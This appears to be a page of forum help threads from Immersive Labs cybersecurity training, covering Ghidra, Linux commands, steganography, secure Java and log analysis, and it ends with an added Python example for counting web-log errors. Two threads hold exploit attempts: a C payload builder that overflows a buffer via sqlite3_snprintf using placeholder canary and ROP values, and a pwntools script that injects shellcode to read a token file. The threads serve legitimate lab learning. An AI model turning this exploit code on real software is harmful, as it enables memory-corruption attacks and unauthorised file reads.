Foundational Static Analysis: API Analysis
Hi all, I'm stuck in this part where, using Ghidra, I have to find where the Windows API GetModuleHandleA is used in the binary called exercise_two.exe and, once located, find the parameter of this function. Taking a look at GetModuleHandleA, there are no references or calls to the API in any part of the code. I also tried to look for references to GetProcAddress or LoadLibrary and found nothing. Am I doing something wrong? Any idea how to find the "parameter" of the function that calls the API? It is the only question from this part remaining... Thanks and regards.

14 views, 1 like, 0 comments

Linux Stack Overflow Ep.6
I am having trouble figuring out this lab. I got the other questions, but can't get the token. This is the code I am running, but it just causes a segmentation fault.

```c
#include <assert.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

/* Distances (in bytes) from the saved return address in the target stack frame. */
#define RETADDR_OFFSET 0
#define CANARY_OFFSET 0x40
#define BUF_OFFSET 0x88
#define CANARY 0xbaadd00dbaadd00dull
#define ROPGADGET 0xdeadbeefdeadbeefull
#define NGADGETS 1

/* Bytes that should land in the target buffer: padding up to the canary,
 * the canary itself, padding up to the return address, then the ROP chain. */
struct payload {
    uint8_t padding1[BUF_OFFSET - CANARY_OFFSET];
    uint64_t canary;
    uint8_t padding2[CANARY_OFFSET - RETADDR_OFFSET - 8];
    uint64_t ropchain[NGADGETS];
} __attribute__((packed, aligned(1)));

int main(int argc, char *argv[])
{
    char dst[256];
    struct payload p;

    memset(p.padding1, 'a', sizeof(p.padding1));
    p.canary = CANARY;
    memset(p.padding2, 'b', sizeof(p.padding2));
    p.ropchain[0] = ROPGADGET;

    /* Target quote count and total source length chosen at the 2^31 / 2^32 boundaries. */
    size_t target_n = 0x80000000;
    assert(sizeof(p) + 3 <= target_n);
    size_t n = target_n - sizeof(p) - 3;
    size_t target_i = 0x100000000 + (sizeof(p) / 2);

    /* Source string: payload, n/2 single quotes, 'c' filler up to 0x7ffffffe,
     * one 0xc0 byte, then 0x80 bytes to the end; NUL-terminated on the last byte. */
    char *src = calloc(1, target_i);
    if (!src) {
        printf("bad allocation\n");
        return -1;
    }

    size_t cur = 0;
    memcpy(src, &p, sizeof(p));
    cur += sizeof(p);
    memset(src + cur, '\'', n / 2);
    cur += n / 2;
    assert(cur < 0x7ffffffeul);
    memset(src + cur, 'c', 0x7ffffffeul - cur);
    cur += 0x7ffffffeul - cur;
    src[cur] = '\xc0';
    cur++;
    memset(src + cur, '\x80', target_i - cur);
    cur = target_i;
    src[cur - 1] = '\0';

    /* Format the oversized source with %q (quote escaping) into a 256-byte stack buffer. */
    sqlite3_snprintf((int)256, dst, "'%!q'", src);
    free(src);
    return 0;
}
```

27 views, 1 like, 1 comment

Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve a lab in Immersive Labs, Pwntools: Ep. 6 — Demonstrate Your Skills, and I got stuck in the last step. I've tried the solution using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible?

```python
shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0)
```

is what I tried.

```python
from pwn import *
import struct

# Start the challenge binary
p = process("/opt/demonstrate-challenge")  # Use the correct path

# === Part 1: Solve Arithmetic Challenge ===
p.recvuntil(b"What is the sum of ")
numbers = p.recvline().decode().strip().split(" and ")
num1 = int(numbers[0])
num2 = int(numbers[1].split("?")[0])
print(f"[+] Solving: {num1} + {num2} = {num1 + num2}")
p.sendline(str(num1 + num2))

# === Part 2: Solve Packing Challenge ===
p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n")
values = p.recvline().decode().strip().split(" and ")
val1 = int(values[0])
val2 = int(values[1])
print(f"[+] Packing values: {val1} and {val2}")
payload = struct.pack("<II", val1, val2)
p.send(payload)

# === Part 3: Leak Address of parsing_check() ===
elf = ELF("/opt/demonstrate-challenge")  # Load the ELF binary
parsing_check_addr = elf.symbols['parsing_check']  # Get function address
print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}")
p.sendline(str(parsing_check_addr))

# === Part 4: Send Shellcode to Read /home/token-user/token.txt ===
file_path = '/home/token-user/token.txt'
shellcode = shellcraft.cat2(file_path, 1, 40)  # Pwntools shellcode
shellcode += shellcraft.ret()  # Ensure proper return
assembled_shellcode = asm(shellcode)
p.send(assembled_shellcode)

# === Get Flag Output ===
response = p.recvall()
print(response)
```

84 views, 1 like, 10 comments

Historic Steganography Lab
I've been stuck on question 6 in the Steganography lab within the Historic Encryption upskill series. I'm not sure if I'm missing something in the command line or if the password/passphrase for the file is wrong. The password/passphrase is supposed to be "carnivale". Here are some screenshots to help zero in on where I'm at. Thanks all!

Solved, 41 views, 2 likes, 2 comments

Help again Linux CLI: Ep.16 – Combining Commands
I feel like I'm banging my head against the wall with the last 2 questions of this lab. I've been stuck on question 5, the grep command. Any hints on what I am doing wrong or missing? And then the last question, to run sleep. Huh? Is there a command to combine with the sleep 600? Any help would be appreciated, so I can finally do the last lab for Linux. =)

Solved, 46 views, 1 like, 2 comments

Need Help - Java: Insecure Temporary Files
This exercise appears to be fairly simple at first glance; however, I am unable to meet the criteria for my code to be accepted. When I click on "Test My Code", it says "Working" but not "Secure". The Deployment Log says:

VERIFY: Testing application functionality...
VERIFY: PASS: Healthcheck page retrieved successfully
VERIFY: PASS: Login page retrieved successfully
VERIFY: PASS: Logged in with valid credentials
VERIFY: PASS: User data loaded
VERIFY: Tests complete. Application is WORKING

Ideally, either the Application Log or the Deployment Log should provide some clue about the error or the task that is not completed. I have used the recommended method to create a temporary file and delete it in a finally block after use. I can provide my code changes here if needed.

Solved, 27 views, 0 likes, 2 comments

Web Log Analysis: Ep.5 – Searching Web Server Logs using Linux CLI
Looking for some tips to help me get past step 1 (!) of this lab. I have tried to cd into Log-Files/ but nothing is returned, and the same for a cat command. I don't have experience with Linux but want to attempt this lab; maybe even some lab recommendations on how to get to a sufficient level with Linux would help? Thanks!!

111 views, 1 like, 7 comments

Need help: Endace: Ep.3 – Elastic Integration Scenario
I stumbled upon this lab after my holidays and I was able to solve all questions except:

So far I was able to follow the path from the first user over to the second user and the service installation, priv. escalation, base64 decodings, password changes on domain controllers, etc.

Problem 1: I can't find any named pipe for Q15. Not in Elastic (and I'm checking all data sources there) nor in the Wireshark dump/Endace GUI.

Problem 2: When I download files via "Extract File" in the Send option I don't get any files (even when I take the whole timeline (~1h)). I can download the logs and see some stuff in there, but not one single file will help me answer Q16.

So, does anyone have an idea where to look? (Or is the lab development not yet finished?)

-steven

Solved, 61 views, 0 likes, 4 comments

Help with "Log Analysis: Web Log Analysis"
Hello, in the lab "Log Analysis: Web Log Analysis", I got stuck at the question "How many errors were logged in total?" First, it is not clear whether it refers to the access.log files or the error.log files. Yet I counted all lines in the access.log files where the status code is not 200, and the answer is wrong. I counted all "error" entries in the error.log files, yet incorrect. What am I doing wrong here?

Solved, 80 views, 0 likes, 10 comments
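The two web-log threads above (Web Log Analysis: Ep.5 and "Log Analysis: Web Log Analysis") both come down to what "error" means in each file, so here is an added example of the counting itself. It is my code, not the poster's, the lab's, or Immersive Labs'; the log lines are constructed and do not reproduce the lab's data, and the lab's own definition of an error is not known from the thread. It parses Apache combined-format access lines, counts requests per status class, counts 4xx/5xx responses as errors (with a lower threshold available for the "anything that is not 200" reading, which also sweeps in 3xx redirects), and counts error.log entries by severity level rather than by the word "error" appearing anywhere on the line.

```python
import re
from collections import Counter

# Apache "combined" access log format; the regex assumes that layout.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)
# Apache error log line: [timestamp] [module:level] [pid ...] message
ERROR_RE = re.compile(r'^\[[^\]]+\] \[(?:(?P<module>\w+):)?(?P<level>\w+)\]')

# Constructed sample data (not taken from the lab).
SAMPLE_ACCESS = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /admin HTTP/1.1" 403 199 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /old HTTP/1.1" 301 0 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /missing HTTP/1.1" 404 209 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:56:03 +0000] "POST /cgi-bin/x HTTP/1.1" 500 0 "-" "curl/7.88"
"""
SAMPLE_ERROR = """\
[Tue Oct 10 13:56:02.000000 2023] [core:error] [pid 1234] [client 10.0.0.9:51000] File does not exist: /var/www/missing
[Tue Oct 10 13:56:03.000000 2023] [cgi:error] [pid 1234] [client 10.0.0.9:51001] Premature end of script headers: x
[Tue Oct 10 13:56:04.000000 2023] [mpm_event:notice] [pid 1] AH00489: Apache/2.4 configured
"""


def parse_access(text):
    """Yield one dict per line that matches the combined format; unparsable lines are skipped."""
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            yield rec


def status_class_counts(text):
    """Count requests per status class ('2xx', '3xx', '4xx', '5xx')."""
    return Counter(f"{rec['status'] // 100}xx" for rec in parse_access(text))


def access_error_count(text, threshold=400):
    """Count access-log 'errors': responses with status >= threshold.

    The default (400) counts client and server errors only; threshold=300
    reproduces the 'not a 200' reading, which also counts redirects.
    """
    return sum(1 for rec in parse_access(text) if rec["status"] >= threshold)


def error_log_level_counts(text):
    """Count error.log entries by severity level (error, warn, notice, ...)."""
    counts = Counter()
    for line in text.splitlines():
        m = ERROR_RE.match(line)
        if m:
            counts[m.group("level")] += 1
    return counts


if __name__ == "__main__":
    print(status_class_counts(SAMPLE_ACCESS))               # 2xx: 1, 3xx: 1, 4xx: 2, 5xx: 1
    print(access_error_count(SAMPLE_ACCESS))                # 3
    print(access_error_count(SAMPLE_ACCESS, threshold=300)) # 4
    print(error_log_level_counts(SAMPLE_ERROR))             # error: 2, notice: 1
```

Running the three counts side by side on real files makes the ambiguity concrete: the 4xx/5xx count, the "not 200" count and the error.log severity count are three different numbers, and only one of them will be the one a given question is asking for.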